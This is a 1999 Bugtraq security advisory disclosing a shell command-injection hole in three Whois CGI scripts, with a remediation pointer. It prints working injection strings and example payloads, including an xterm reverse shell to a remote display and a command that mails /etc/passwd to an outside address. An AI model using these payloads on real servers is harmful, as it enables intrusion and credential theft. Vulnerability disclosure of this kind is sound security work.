[12925] in bugtraq
Whois.cgi - ADVISORY.
daemon@ATHENA.MIT.EDU (Cody T. - hhp)
Fri Dec 10 14:26:00 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Message-Id: <19991210025310.B82291F23E@lists.securityfocus.com>
Date: Tue, 9 Nov 1999 20:51:58 -0600
Reply-To: hhp@secure.usarmy.com
From: "Cody T. - hhp" <hhp@secure.usarmy.com>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
(hhp) Whois.CGI - ADVISORY. (hhp)
hhp-ADV#12
11/9/99 8:42:57pm CST
By: loophole
hhp@hhp.perlx.com - http://hhp.perlx.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What?:
Hole in several known/unknown Whois CGI
packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Versions?:
1.) Whois Internic Lookup - version: 1.0
2.) CC Whois - Version: 1.0
3.) Matt's Whois - Version: 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit!:
These versions allow execution of commands
due to lack of shell escape character
parsing if the domain entries consist of
one of the following strings...
Note: (Strings will vary for different
vulnerable versions.)
1.) ;commands
2.) ";commands
3.) ;commands;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Example!:
If the domain entries consist of:
1.) ;id
2.) ";id
or either,
3.) ;id;
you will see something like this:
'Whois Server Version 1.1
Domain names in the .com, .net, and .org
domains can now be registered with many
different competing registrars. Go to
http://www.internic.net for detailed
information. etc. etc. etc....
(scroll to the bottom of the output.)
uid=501(blah) gid=500(blah)'
^^^^^\
` 'id' was executed on the server.
Other example commands can be ran also...
;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail you@yourdomain.com;
Etc, Etc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Foo!:
Alot of main *NIC* servers were found
running vulnerable versions. I am in the
process of contacting the main servers,
and the software programmers to advise the
vulnerability.
Very well known/used sites are
vulnerable (Which will rename nameless for
security reasons). I tried to get in
contact with them, but being such a big
company/service, I failed, so sad indeed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fix?:
If you run one of these bad scripts,
delete it and point your browser to:
http://cgi.resourceindex.com/Programs_and_
Scripts/Perl/Internet_Utilities/Whois/
and download one of the secure packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shouts to all of hhp.
Fuck you to gH for trying to rip this ADV
before I could release it.
---hhp-2t0--------------------------------
